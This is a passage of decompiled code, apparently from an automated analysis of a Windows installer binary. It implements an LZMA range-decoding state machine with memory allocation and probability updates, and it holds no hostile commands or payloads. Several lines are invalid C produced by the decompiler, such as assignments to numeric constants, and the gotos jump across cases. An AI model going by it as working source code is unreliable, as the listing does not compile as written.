                                                                                                                        													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                        												} while (_t612 != 0);
                                                                                                                        												goto L12;
                                                                                                                        											}
                                                                                                                        											if( *(_t613 - 4) != 0) {
                                                                                                                        												GlobalFree( *(_t613 - 4));
                                                                                                                        											}
                                                                                                                        											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        											 *(_t613 - 4) = _t534;
                                                                                                                        											if(_t534 == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											} else {
                                                                                                                        												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                        												goto L10;
                                                                                                                        											}
                                                                                                                        										case 1:
                                                                                                                        											L13:
                                                                                                                        											__eflags =  *(_t613 - 0x6c);
                                                                                                                        											if( *(_t613 - 0x6c) == 0) {
                                                                                                                        												 *(_t613 - 0x88) = 1;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                        											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        											_t45 = _t613 - 0x48;
                                                                                                                        											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                        											__eflags =  *_t45;
                                                                                                                        											L15:
                                                                                                                        											if( *(_t613 - 0x48) < 4) {
                                                                                                                        												goto L13;
                                                                                                                        											}
                                                                                                                        											_t546 =  *(_t613 - 0x40);
                                                                                                                        											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                        												L20:
                                                                                                                        												 *(_t613 - 0x48) = 5;
                                                                                                                        												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                        												goto L23;
                                                                                                                        											}
                                                                                                                        											 *(_t613 - 0x74) = _t546;
                                                                                                                        											if( *(_t613 - 8) != 0) {
                                                                                                                        												GlobalFree( *(_t613 - 8));
                                                                                                                        											}
                                                                                                                        											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                        											 *(_t613 - 8) = _t534;
                                                                                                                        											if(_t534 == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											} else {
                                                                                                                        												goto L20;
                                                                                                                        											}
                                                                                                                        										case 2:
                                                                                                                        											L24:
                                                                                                                        											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                                                        											 *(_t613 - 0x84) = 6;
                                                                                                                        											 *(_t613 - 0x4c) = _t553;
                                                                                                                        											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                                                        											 *(_t613 - 0x54) = _t606;
                                                                                                                        											goto L133;
                                                                                                                        										case 3:
                                                                                                                        											L21:
                                                                                                                        											__eflags =  *(_t613 - 0x6c);
                                                                                                                        											if( *(_t613 - 0x6c) == 0) {
                                                                                                                        												 *(_t613 - 0x88) = 3;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        											_t67 = _t613 - 0x70;
                                                                                                                        											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        											__eflags =  *_t67;
                                                                                                                        											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                        											L23:
                                                                                                                        											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                                                        											if( *(_t613 - 0x48) != 0) {
                                                                                                                        												goto L21;
                                                                                                                        											}
                                                                                                                        											goto L24;
                                                                                                                        										case 4:
                                                                                                                        											L133:
                                                                                                                        											_t531 =  *_t606;
                                                                                                                        											_t589 = _t531 & 0x0000ffff;
                                                                                                                        											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                        											if( *(_t613 - 0xc) >= _t565) {
                                                                                                                        												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                        												 *(_t613 - 0x40) = 1;
                                                                                                                        												_t532 = _t531 - (_t531 >> 5);
                                                                                                                        												 *_t606 = _t532;
                                                                                                                        											} else {
                                                                                                                        												 *(_t613 - 0x10) = _t565;
                                                                                                                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                        											}
                                                                                                                        											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                        												goto L139;
                                                                                                                        											}
                                                                                                                        										case 5:
                                                                                                                        											goto L137;
                                                                                                                        										case 6:
                                                                                                                        											__edx = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x34) = 1;
                                                                                                                        												 *(__ebp - 0x84) = 7;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                        												while(1) {
                                                                                                                        													 *(_t613 - 0x54) = _t606;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        											__esi =  *(__ebp - 0x60);
                                                                                                                        											__cl = 8;
                                                                                                                        											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                        											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                                                                        											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                        											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                        											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        											if( *(__ebp - 0x38) >= 4) {
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                        												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        													_t98 = __ebp - 0x38;
                                                                                                                        													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                        													__eflags =  *_t98;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x38) = 0;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                        											if( *(__ebp - 0x34) == __edx) {
                                                                                                                        												__ebx = 0;
                                                                                                                        												__ebx = 1;
                                                                                                                        												goto L61;
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 8);
                                                                                                                        												__ebx = 0;
                                                                                                                        												__ebx = 1;
                                                                                                                        												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        												goto L41;
                                                                                                                        											}
                                                                                                                        										case 7:
                                                                                                                        											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                        											if( *(__ebp - 0x40) != 1) {
                                                                                                                        												__eax =  *(__ebp - 0x24);
                                                                                                                        												 *(__ebp - 0x80) = 0x16;
                                                                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        												__eax =  *(__ebp - 0x28);
                                                                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        												__al = __al & 0x000000fd;
                                                                                                                        												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												goto L69;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 4);
                                                                                                                        											__ecx =  *(__ebp - 0x38);
                                                                                                                        											 *(__ebp - 0x84) = 8;
                                                                                                                        											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                        											while(1) {
                                                                                                                        												 *(_t613 - 0x54) = _t606;
                                                                                                                        												goto L133;
                                                                                                                        											}
                                                                                                                        										case 8:
                                                                                                                        											goto L0;
                                                                                                                        										case 9:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												goto L89;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x60);
                                                                                                                        											if( *(__ebp - 0x60) == 0) {
                                                                                                                        												goto L171;
                                                                                                                        											}
                                                                                                                        											__eax = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        											__eflags = _t258;
                                                                                                                        											0 | _t258 = _t258 + _t258 + 9;
                                                                                                                        											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                        											goto L75;
                                                                                                                        										case 0xa:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x84) = 0xb;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                        												while(1) {
                                                                                                                        													 *(_t613 - 0x54) = _t606;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x28);
                                                                                                                        											goto L88;
                                                                                                                        										case 0xb:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__ecx =  *(__ebp - 0x24);
                                                                                                                        												__eax =  *(__ebp - 0x20);
                                                                                                                        												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        											} else {
                                                                                                                        												__eax =  *(__ebp - 0x24);
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x28);
                                                                                                                        											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        											L88:
                                                                                                                        											__ecx =  *(__ebp - 0x2c);
                                                                                                                        											 *(__ebp - 0x2c) = __eax;
                                                                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        											L89:
                                                                                                                        											__eax =  *(__ebp - 4);
                                                                                                                        											 *(__ebp - 0x80) = 0x15;
                                                                                                                        											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                        											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                        											goto L69;
                                                                                                                        										case 0xc:
                                                                                                                        											L99:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xc;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t334 = __ebp - 0x70;
                                                                                                                        											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t334;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											__eax =  *(__ebp - 0x2c);
                                                                                                                        											goto L101;
                                                                                                                        										case 0xd:
                                                                                                                        											L37:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xd;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t122 = __ebp - 0x70;
                                                                                                                        											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t122;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L39:
                                                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                                                        											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        												goto L48;
                                                                                                                        											}
                                                                                                                        											__eflags = __ebx - 0x100;
                                                                                                                        											if(__ebx >= 0x100) {
                                                                                                                        												goto L54;
                                                                                                                        											}
                                                                                                                        											L41:
                                                                                                                        											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        											 *(__ebp - 0x48) = __eax;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__eax = __eax << 8;
                                                                                                                        											__eax = __eax + __ebx;
                                                                                                                        											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__edx = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												 *(__ebp - 0x40) = 1;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												__ebx = __ebx + __ebx + 1;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edx;
                                                                                                                        												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L39;
                                                                                                                        											} else {
                                                                                                                        												goto L37;
                                                                                                                        											}
                                                                                                                        										case 0xe:
                                                                                                                        											L46:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xe;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t156 = __ebp - 0x70;
                                                                                                                        											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t156;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											while(1) {
                                                                                                                        												L48:
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__edx = __ebx + __ebx;
                                                                                                                        												__ecx =  *(__ebp - 0x10);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													_t170 = __edx + 1; // 0x1
                                                                                                                        													__ebx = _t170;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													goto L46;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											L54:
                                                                                                                        											_t173 = __ebp - 0x34;
                                                                                                                        											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        											__eflags =  *_t173;
                                                                                                                        											goto L55;
                                                                                                                        										case 0xf:
                                                                                                                        											L58:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0xf;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t203 = __ebp - 0x70;
                                                                                                                        											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t203;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											L60:
                                                                                                                        											__eflags = __ebx - 0x100;
                                                                                                                        											if(__ebx >= 0x100) {
                                                                                                                        												L55:
                                                                                                                        												__al =  *(__ebp - 0x44);
                                                                                                                        												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        												goto L56;
                                                                                                                        											}
                                                                                                                        											L61:
                                                                                                                        											__eax =  *(__ebp - 0x58);
                                                                                                                        											__edx = __ebx + __ebx;
                                                                                                                        											__ecx =  *(__ebp - 0x10);
                                                                                                                        											__esi = __edx + __eax;
                                                                                                                        											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        											__ax =  *__esi;
                                                                                                                        											 *(__ebp - 0x54) = __esi;
                                                                                                                        											__edi = __ax & 0x0000ffff;
                                                                                                                        											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												__cx = __ax;
                                                                                                                        												_t217 = __edx + 1; // 0x1
                                                                                                                        												__ebx = _t217;
                                                                                                                        												__cx = __ax >> 5;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												 *__esi = __ax;
                                                                                                                        											} else {
                                                                                                                        												 *(__ebp - 0x10) = __ecx;
                                                                                                                        												0x800 = 0x800 - __edi;
                                                                                                                        												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        												__ebx = __ebx + __ebx;
                                                                                                                        												 *__esi = __cx;
                                                                                                                        											}
                                                                                                                        											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        											 *(__ebp - 0x44) = __ebx;
                                                                                                                        											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        												goto L60;
                                                                                                                        											} else {
                                                                                                                        												goto L58;
                                                                                                                        											}
                                                                                                                        										case 0x10:
                                                                                                                        											L109:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x10;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
                                                                                                                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											_t365 = __ebp - 0x70;
                                                                                                                        											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                        											__eflags =  *_t365;
                                                                                                                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        											goto L111;
                                                                                                                        										case 0x11:
                                                                                                                        											L69:
                                                                                                                        											__esi =  *(__ebp - 0x58);
                                                                                                                        											 *(__ebp - 0x84) = 0x12;
                                                                                                                        											while(1) {
                                                                                                                        												 *(_t613 - 0x54) = _t606;
                                                                                                                        												goto L133;
                                                                                                                        											}
                                                                                                                        										case 0x12:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												 *(__ebp - 0x84) = 0x13;
                                                                                                                        												__esi =  *(__ebp - 0x58) + 2;
                                                                                                                        												while(1) {
                                                                                                                        													 *(_t613 - 0x54) = _t606;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x4c);
                                                                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        											__eflags = __eax;
                                                                                                                        											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        											goto L130;
                                                                                                                        										case 0x13:
                                                                                                                        											__eflags =  *(__ebp - 0x40);
                                                                                                                        											if( *(__ebp - 0x40) != 0) {
                                                                                                                        												_t469 = __ebp - 0x58;
                                                                                                                        												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        												__eflags =  *_t469;
                                                                                                                        												 *(__ebp - 0x30) = 0x10;
                                                                                                                        												 *(__ebp - 0x40) = 8;
                                                                                                                        												L144:
                                                                                                                        												 *(__ebp - 0x7c) = 0x14;
                                                                                                                        												goto L145;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x4c);
                                                                                                                        											__ecx =  *(__ebp - 0x58);
                                                                                                                        											__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        											 *(__ebp - 0x30) = 8;
                                                                                                                        											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        											L130:
                                                                                                                        											 *(__ebp - 0x58) = __eax;
                                                                                                                        											 *(__ebp - 0x40) = 3;
                                                                                                                        											goto L144;
                                                                                                                        										case 0x14:
                                                                                                                        											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        											__eax =  *(__ebp - 0x80);
                                                                                                                        											 *(_t613 - 0x88) = _t533;
                                                                                                                        											goto L1;
                                                                                                                        										case 0x15:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        											__al = __al & 0x000000fd;
                                                                                                                        											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        											goto L120;
                                                                                                                        										case 0x16:
                                                                                                                        											__eax =  *(__ebp - 0x30);
                                                                                                                        											__eflags = __eax - 4;
                                                                                                                        											if(__eax >= 4) {
                                                                                                                        												_push(3);
                                                                                                                        												_pop(__eax);
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 4);
                                                                                                                        											 *(__ebp - 0x40) = 6;
                                                                                                                        											__eax = __eax << 7;
                                                                                                                        											 *(__ebp - 0x7c) = 0x19;
                                                                                                                        											 *(__ebp - 0x58) = __eax;
                                                                                                                        											goto L145;
                                                                                                                        										case 0x17:
                                                                                                                        											L145:
                                                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                                                        											 *(__ebp - 0x50) = 1;
                                                                                                                        											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                        											goto L149;
                                                                                                                        										case 0x18:
                                                                                                                        											L146:
                                                                                                                        											__eflags =  *(__ebp - 0x6c);
                                                                                                                        											if( *(__ebp - 0x6c) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x18;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__ecx =  *(__ebp - 0x70);
                                                                                                                        											__eax =  *(__ebp - 0xc);
